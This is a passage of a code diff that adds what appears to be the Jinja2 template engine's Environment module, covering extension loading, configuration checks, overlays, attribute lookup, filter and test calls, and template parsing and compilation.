the extensions from the list and bind it to the environment. + Returns a dict of instantiated extensions. + """ + result = {} + + for extension in extensions: + if isinstance(extension, str): + extension = t.cast(t.Type["Extension"], import_string(extension)) + + result[extension.identifier] = extension(environment) + + return result + + +def _environment_config_check(environment: "Environment") -> "Environment": + """Perform a sanity check on the environment.""" + assert issubclass( + environment.undefined, Undefined + ), "'undefined' must be a subclass of 'jinja2.Undefined'." + assert ( + environment.block_start_string + != environment.variable_start_string + != environment.comment_start_string + ), "block, variable and comment start strings must be different." + assert environment.newline_sequence in { + "\r", + "\r\n", + "\n", + }, "'newline_sequence' must be one of '\\n', '\\r\\n', or '\\r'." + return environment + + +class Environment: + r"""The core component of Jinja is the `Environment`. It contains + important shared variables like configuration, filters, tests, + globals and others. Instances of this class may be modified if + they are not shared and if no template was loaded so far. + Modifications on environments after the first template was loaded + will lead to surprising effects and undefined behavior. + + Here are the possible initialization parameters: + + `block_start_string` + The string marking the beginning of a block. Defaults to ``'{%'``. + + `block_end_string` + The string marking the end of a block. Defaults to ``'%}'``. + + `variable_start_string` + The string marking the beginning of a print statement. + Defaults to ``'{{'``. + + `variable_end_string` + The string marking the end of a print statement. Defaults to + ``'}}'``. + + `comment_start_string` + The string marking the beginning of a comment. Defaults to ``'{#'``. + + `comment_end_string` + The string marking the end of a comment. Defaults to ``'#}'``. + + `line_statement_prefix` + If given and a string, this will be used as prefix for line based + statements. See also :ref:`line-statements`. + + `line_comment_prefix` + If given and a string, this will be used as prefix for line based + comments. See also :ref:`line-statements`. + + .. versionadded:: 2.2 + + `trim_blocks` + If this is set to ``True`` the first newline after a block is + removed (block, not variable tag!). Defaults to `False`. + + `lstrip_blocks` + If this is set to ``True`` leading spaces and tabs are stripped + from the start of a line to a block. Defaults to `False`. + + `newline_sequence` + The sequence that starts a newline. Must be one of ``'\r'``, + ``'\n'`` or ``'\r\n'``. The default is ``'\n'`` which is a + useful default for Linux and OS X systems as well as web + applications. + + `keep_trailing_newline` + Preserve the trailing newline when rendering templates. + The default is ``False``, which causes a single newline, + if present, to be stripped from the end of the template. + + .. versionadded:: 2.7 + + `extensions` + List of Jinja extensions to use. This can either be import paths + as strings or extension classes. For more information have a + look at :ref:`the extensions documentation `. + + `optimized` + should the optimizer be enabled? Default is ``True``. + + `undefined` + :class:`Undefined` or a subclass of it that is used to represent + undefined values in the template. + + `finalize` + A callable that can be used to process the result of a variable + expression before it is output. For example one can convert + ``None`` implicitly into an empty string here. + + `autoescape` + If set to ``True`` the XML/HTML autoescaping feature is enabled by + default. For more details about autoescaping see + :class:`~markupsafe.Markup`. As of Jinja 2.4 this can also + be a callable that is passed the template name and has to + return ``True`` or ``False`` depending on autoescape should be + enabled by default. + + .. versionchanged:: 2.4 + `autoescape` can now be a function + + `loader` + The template loader for this environment. + + `cache_size` + The size of the cache. Per default this is ``400`` which means + that if more than 400 templates are loaded the loader will clean + out the least recently used template. If the cache size is set to + ``0`` templates are recompiled all the time, if the cache size is + ``-1`` the cache will not be cleaned. + + .. versionchanged:: 2.8 + The cache size was increased to 400 from a low 50. + + `auto_reload` + Some loaders load templates from locations where the template + sources may change (ie: file system or database). If + ``auto_reload`` is set to ``True`` (default) every time a template is + requested the loader checks if the source changed and if yes, it + will reload the template. For higher performance it's possible to + disable that. + + `bytecode_cache` + If set to a bytecode cache object, this object will provide a + cache for the internal Jinja bytecode so that templates don't + have to be parsed if they were not changed. + + See :ref:`bytecode-cache` for more information. + + `enable_async` + If set to true this enables async template execution which + allows using async functions and generators. + """ + + #: if this environment is sandboxed. Modifying this variable won't make + #: the environment sandboxed though. For a real sandboxed environment + #: have a look at jinja2.sandbox. This flag alone controls the code + #: generation by the compiler. + sandboxed = False + + #: True if the environment is just an overlay + overlayed = False + + #: the environment this environment is linked to if it is an overlay + linked_to: t.Optional["Environment"] = None + + #: shared environments have this set to `True`. A shared environment + #: must not be modified + shared = False + + #: the class that is used for code generation. See + #: :class:`~jinja2.compiler.CodeGenerator` for more information. + code_generator_class: t.Type["CodeGenerator"] = CodeGenerator + + concat = "".join + + #: the context class that is used for templates. See + #: :class:`~jinja2.runtime.Context` for more information. + context_class: t.Type[Context] = Context + + template_class: t.Type["Template"] + + def __init__( + self, + block_start_string: str = BLOCK_START_STRING, + block_end_string: str = BLOCK_END_STRING, + variable_start_string: str = VARIABLE_START_STRING, + variable_end_string: str = VARIABLE_END_STRING, + comment_start_string: str = COMMENT_START_STRING, + comment_end_string: str = COMMENT_END_STRING, + line_statement_prefix: t.Optional[str] = LINE_STATEMENT_PREFIX, + line_comment_prefix: t.Optional[str] = LINE_COMMENT_PREFIX, + trim_blocks: bool = TRIM_BLOCKS, + lstrip_blocks: bool = LSTRIP_BLOCKS, + newline_sequence: "te.Literal['\\n', '\\r\\n', '\\r']" = NEWLINE_SEQUENCE, + keep_trailing_newline: bool = KEEP_TRAILING_NEWLINE, + extensions: t.Sequence[t.Union[str, t.Type["Extension"]]] = (), + optimized: bool = True, + undefined: t.Type[Undefined] = Undefined, + finalize: t.Optional[t.Callable[..., t.Any]] = None, + autoescape: t.Union[bool, t.Callable[[t.Optional[str]], bool]] = False, + loader: t.Optional["BaseLoader"] = None, + cache_size: int = 400, + auto_reload: bool = True, + bytecode_cache: t.Optional["BytecodeCache"] = None, + enable_async: bool = False, + ): + # !!Important notice!! + # The constructor accepts quite a few arguments that should be + # passed by keyword rather than position. However it's important to + # not change the order of arguments because it's used at least + # internally in those cases: + # - spontaneous environments (i18n extension and Template) + # - unittests + # If parameter changes are required only add parameters at the end + # and don't change the arguments (or the defaults!) of the arguments + # existing already. + + # lexer / parser information + self.block_start_string = block_start_string + self.block_end_string = block_end_string + self.variable_start_string = variable_start_string + self.variable_end_string = variable_end_string + self.comment_start_string = comment_start_string + self.comment_end_string = comment_end_string + self.line_statement_prefix = line_statement_prefix + self.line_comment_prefix = line_comment_prefix + self.trim_blocks = trim_blocks + self.lstrip_blocks = lstrip_blocks + self.newline_sequence = newline_sequence + self.keep_trailing_newline = keep_trailing_newline + + # runtime information + self.undefined: t.Type[Undefined] = undefined + self.optimized = optimized + self.finalize = finalize + self.autoescape = autoescape + + # defaults + self.filters = DEFAULT_FILTERS.copy() + self.tests = DEFAULT_TESTS.copy() + self.globals = DEFAULT_NAMESPACE.copy() + + # set the loader provided + self.loader = loader + self.cache = create_cache(cache_size) + self.bytecode_cache = bytecode_cache + self.auto_reload = auto_reload + + # configurable policies + self.policies = DEFAULT_POLICIES.copy() + + # load extensions + self.extensions = load_extensions(self, extensions) + + self.is_async = enable_async + _environment_config_check(self) + + def add_extension(self, extension: t.Union[str, t.Type["Extension"]]) -> None: + """Adds an extension after the environment was created. + + .. versionadded:: 2.5 + """ + self.extensions.update(load_extensions(self, [extension])) + + def extend(self, **attributes: t.Any) -> None: + """Add the items to the instance of the environment if they do not exist + yet. This is used by :ref:`extensions ` to register + callbacks and configuration values without breaking inheritance. + """ + for key, value in attributes.items(): + if not hasattr(self, key): + setattr(self, key, value) + + def overlay( + self, + block_start_string: str = missing, + block_end_string: str = missing, + variable_start_string: str = missing, + variable_end_string: str = missing, + comment_start_string: str = missing, + comment_end_string: str = missing, + line_statement_prefix: t.Optional[str] = missing, + line_comment_prefix: t.Optional[str] = missing, + trim_blocks: bool = missing, + lstrip_blocks: bool = missing, + newline_sequence: "te.Literal['\\n', '\\r\\n', '\\r']" = missing, + keep_trailing_newline: bool = missing, + extensions: t.Sequence[t.Union[str, t.Type["Extension"]]] = missing, + optimized: bool = missing, + undefined: t.Type[Undefined] = missing, + finalize: t.Optional[t.Callable[..., t.Any]] = missing, + autoescape: t.Union[bool, t.Callable[[t.Optional[str]], bool]] = missing, + loader: t.Optional["BaseLoader"] = missing, + cache_size: int = missing, + auto_reload: bool = missing, + bytecode_cache: t.Optional["BytecodeCache"] = missing, + enable_async: bool = False, + ) -> "Environment": + """Create a new overlay environment that shares all the data with the + current environment except for cache and the overridden attributes. + Extensions cannot be removed for an overlayed environment. An overlayed + environment automatically gets all the extensions of the environment it + is linked to plus optional extra extensions. + + Creating overlays should happen after the initial environment was set + up completely. Not all attributes are truly linked, some are just + copied over so modifications on the original environment may not shine + through. + + .. versionchanged:: 3.1.2 + Added the ``newline_sequence``,, ``keep_trailing_newline``, + and ``enable_async`` parameters to match ``__init__``. + """ + args = dict(locals()) + del args["self"], args["cache_size"], args["extensions"], args["enable_async"] + + rv = object.__new__(self.__class__) + rv.__dict__.update(self.__dict__) + rv.overlayed = True + rv.linked_to = self + + for key, value in args.items(): + if value is not missing: + setattr(rv, key, value) + + if cache_size is not missing: + rv.cache = create_cache(cache_size) + else: + rv.cache = copy_cache(self.cache) + + rv.extensions = {} + for key, value in self.extensions.items(): + rv.extensions[key] = value.bind(rv) + if extensions is not missing: + rv.extensions.update(load_extensions(rv, extensions)) + + if enable_async is not missing: + rv.is_async = enable_async + + return _environment_config_check(rv) + + @property + def lexer(self) -> Lexer: + """The lexer for this environment.""" + return get_lexer(self) + + def iter_extensions(self) -> t.Iterator["Extension"]: + """Iterates over the extensions by priority.""" + return iter(sorted(self.extensions.values(), key=lambda x: x.priority)) + + def getitem( + self, obj: t.Any, argument: t.Union[str, t.Any] + ) -> t.Union[t.Any, Undefined]: + """Get an item or attribute of an object but prefer the item.""" + try: + return obj[argument] + except (AttributeError, TypeError, LookupError): + if isinstance(argument, str): + try: + attr = str(argument) + except Exception: + pass + else: + try: + return getattr(obj, attr) + except AttributeError: + pass + return self.undefined(obj=obj, name=argument) + + def getattr(self, obj: t.Any, attribute: str) -> t.Any: + """Get an item or attribute of an object but prefer the attribute. + Unlike :meth:`getitem` the attribute *must* be a string. + """ + try: + return getattr(obj, attribute) + except AttributeError: + pass + try: + return obj[attribute] + except (TypeError, LookupError, AttributeError): + return self.undefined(obj=obj, name=attribute) + + def _filter_test_common( + self, + name: t.Union[str, Undefined], + value: t.Any, + args: t.Optional[t.Sequence[t.Any]], + kwargs: t.Optional[t.Mapping[str, t.Any]], + context: t.Optional[Context], + eval_ctx: t.Optional[EvalContext], + is_filter: bool, + ) -> t.Any: + if is_filter: + env_map = self.filters + type_name = "filter" + else: + env_map = self.tests + type_name = "test" + + func = env_map.get(name) # type: ignore + + if func is None: + msg = f"No {type_name} named {name!r}." + + if isinstance(name, Undefined): + try: + name._fail_with_undefined_error() + except Exception as e: + msg = f"{msg} ({e}; did you forget to quote the callable name?)" + + raise TemplateRuntimeError(msg) + + args = [value, *(args if args is not None else ())] + kwargs = kwargs if kwargs is not None else {} + pass_arg = _PassArg.from_obj(func) + + if pass_arg is _PassArg.context: + if context is None: + raise TemplateRuntimeError( + f"Attempted to invoke a context {type_name} without context." + ) + + args.insert(0, context) + elif pass_arg is _PassArg.eval_context: + if eval_ctx is None: + if context is not None: + eval_ctx = context.eval_ctx + else: + eval_ctx = EvalContext(self) + + args.insert(0, eval_ctx) + elif pass_arg is _PassArg.environment: + args.insert(0, self) + + return func(*args, **kwargs) + + def call_filter( + self, + name: str, + value: t.Any, + args: t.Optional[t.Sequence[t.Any]] = None, + kwargs: t.Optional[t.Mapping[str, t.Any]] = None, + context: t.Optional[Context] = None, + eval_ctx: t.Optional[EvalContext] = None, + ) -> t.Any: + """Invoke a filter on a value the same way the compiler does. + + This might return a coroutine if the filter is running from an + environment in async mode and the filter supports async + execution. It's your responsibility to await this if needed. + + .. versionadded:: 2.7 + """ + return self._filter_test_common( + name, value, args, kwargs, context, eval_ctx, True + ) + + def call_test( + self, + name: str, + value: t.Any, + args: t.Optional[t.Sequence[t.Any]] = None, + kwargs: t.Optional[t.Mapping[str, t.Any]] = None, + context: t.Optional[Context] = None, + eval_ctx: t.Optional[EvalContext] = None, + ) -> t.Any: + """Invoke a test on a value the same way the compiler does. + + This might return a coroutine if the test is running from an + environment in async mode and the test supports async execution. + It's your responsibility to await this if needed. + + .. versionchanged:: 3.0 + Tests support ``@pass_context``, etc. decorators. Added + the ``context`` and ``eval_ctx`` parameters. + + .. versionadded:: 2.7 + """ + return self._filter_test_common( + name, value, args, kwargs, context, eval_ctx, False + ) + + @internalcode + def parse( + self, + source: str, + name: t.Optional[str] = None, + filename: t.Optional[str] = None, + ) -> nodes.Template: + """Parse the sourcecode and return the abstract syntax tree. This + tree of nodes is used by the compiler to convert the template into + executable source- or bytecode. This is useful for debugging or to + extract information from templates. + + If you are :ref:`developing Jinja extensions ` + this gives you a good overview of the node tree generated. + """ + try: + return self._parse(source, name, filename) + except TemplateSyntaxError: + self.handle_exception(source=source) + + def _parse( + self, source: str, name: t.Optional[str], filename: t.Optional[str] + ) -> nodes.Template: + """Internal parsing function used by `parse` and `compile`.""" + return Parser(self, source, name, filename).parse() + + def lex( + self, + source: str, + name: t.Optional[str] = None, + filename: t.Optional[str] = None, + ) -> t.Iterator[t.Tuple[int, str, str]]: + """Lex the given sourcecode and return a generator that yields + tokens as tuples in the form ``(lineno, token_type, value)``. + This can be useful for :ref:`extension development ` + and debugging templates. + + This does not perform preprocessing. If you want the preprocessing + of the extensions to be applied you have to filter source through + the :meth:`preprocess` method. + """ + source = str(source) + try: + return self.lexer.tokeniter(source, name, filename) + except TemplateSyntaxError: + self.handle_exception(source=source) + + def preprocess( + self, + source: str, + name: t.Optional[str] = None, + filename: t.Optional[str] = None, + ) -> str: + """Preprocesses the source with all extensions. This is automatically + called for all parsing and compiling methods but *not* for :meth:`lex` + because there you usually only want the actual source tokenized. + """ + return reduce( + lambda s, e: e.preprocess(s, name, filename), + self.iter_extensions(), + str(source), + ) + + def _tokenize( + self, + source: str, + name: t.Optional[str], + filename: t.Optional[str] = None, + state: t.Optional[str] = None, + ) -> TokenStream: + """Called by the parser to do the preprocessing and filtering + for all the extensions. Returns a :class:`~jinja2.lexer.TokenStream`. + """ + source = self.preprocess(source, name, filename) + stream = self.lexer.tokenize(source, name, filename, state) + + for ext in self.iter_extensions(): + stream = ext.filter_stream(stream) # type: ignore + + if not isinstance(stream, TokenStream): + stream = TokenStream(stream, name, filename) # type: ignore + + return stream + + def _generate( + self, + source: nodes.Template, + name: t.Optional[str], + filename: t.Optional[str], + defer_init: bool = False, + ) -> str: + """Internal hook that can be overridden to hook a different generate + method in. + + .. versionadded:: 2.5 + """ + return generate( # type: ignore + source, + self, + name, + filename, + defer_init=defer_init, + optimized=self.optimized, + ) + + def _compile(self, source: str, filename: str) -> CodeType: + """Internal hook that can be overridden to hook a different compile + method in. + + .. versionadded:: 2.5 + """ + return compile(source, filename, "exec") # type: ignore + + @typing.overload + def compile( # type: ignore + self, + source: t.Union[str, nodes.Template], + name: t.Optional[str] = None, + filename: t.Optional[str] = None, + raw: "te.Literal[False]" = False, + defer_init: bool = False, + ) -> CodeType: + ... + + @typing.overload + def compile( + self, + source: t.Union[str, nodes.Template], + name: t.Optional[str] = None, + filename: t.Optional[str] = None, + raw: "te.Literal[True]" = ..., + defer_init: bool = False, + ) -> str: + ... + + @internalcode + def compile( + self, + source: t.Union[str, nodes.Template], + name: t.Optional[str] = None, + filename: t.Optional[str] = None, + raw: bool = False, + defer_init: bool = False, + ) -> t.Union[str, CodeType]: + """Compile a node or template source code. The `name` parameter is + the load name of the template after it was joined using + :meth:`join_path` if necessary, not the filename on the file system. + the `filename` parameter is the estimated filename of the template on + the file system. If the template came from a database or memory this + can be omitted. + + The return value of this method is a python code object. If the `raw` + parameter is `True` the return value will be a string with python + code equivalent to the bytecode returned otherwise. This method is + mainly used internally. + + `defer_init` is use internally to aid the module code generator. This + causes the generated code to be able to import without the global + environment variable to be set. + + .. versionadded:: 2.4 + `defer_init` parameter added. + """ + source_hint = None + try: + if isinstance(source, str): + source_hint = source + source = self._parse(source, name, filename) + source = self._generate(source, name, filename, defer_init=defer_init) + if raw: + return source + if filename is None: + filename = "